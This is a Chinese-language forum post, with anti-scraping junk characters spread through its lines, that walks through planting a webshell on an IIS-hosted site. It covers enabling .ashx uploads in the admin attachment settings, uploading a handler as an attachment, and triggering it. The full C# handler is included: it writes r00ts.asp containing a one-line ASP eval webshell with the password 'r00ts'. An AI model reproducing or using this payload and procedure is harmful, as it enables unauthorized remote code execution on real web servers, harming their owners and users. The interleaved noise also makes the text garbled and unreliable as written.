首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
- B9 e; W2 w7 o# F6 ~
8 Q: J& X' \) ~1 Z( |群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
y; I. h3 H2 P% P1 L' x6 j% { " Y" B- M7 B7 l. |
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
: c2 i+ O+ w# l & w! F1 w0 Z: Z% \. D( B. J7 H
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx/ u, r& S2 x R6 r& w
$ c8 A/ M# `+ ^% V
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts: [5 K" @6 L+ t9 W
- T' b( r! U) @! i4 C
下面是代码:8 F0 ?# {) B; _/ P
) e1 a& \$ N- K7 Q- L0 v# g4 n
<%@ WebHandler Language="C#"Class="Handler" %>8 T. o# h" Y s. B1 Y3 l4 Y
using System;
4 s8 e C- ~9 R6 b1 c5 h' ]6 gusing System.Web;+ h5 w) c. U+ x6 n- [5 \. r/ g7 A
using System.IO;
- b2 ]9 m# f' R5 s. `public class Handler : IHttpHandler {
" j4 r: T' ?& H1 g- tpublic void ProcessRequest (HttpContext context) {0 o9 @9 L. ~4 R u" K& H5 P
context.Response.ContentType = "text/plain";
! a2 B' e, @$ S+ D1 nStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));1 E" G" V4 p6 {0 L0 t
file1.Write("<%eval request(\"r00ts\")%>");
+ O2 W* o" e0 I& m9 N: Yfile1.Flush();/ V( [/ t" v+ ^6 ^' D
file1.Close();
( w% D, U1 Y# U; ?' Y$ B8 T# P}
; Q# S6 L3 |1 v. o0 {public bool IsReusable {$ p" |! J, E- _' L% F$ C$ t# [; P
get {! G4 M' V3 ?: |" u( z
return false;
6 V/ [+ v- y. L* X( h/ z T/ b}/ V" g) H+ w, X6 H# N/ b
}$ A5 y: n- }' U; ~6 A1 j
}
0 n' l4 W4 e1 \8 s |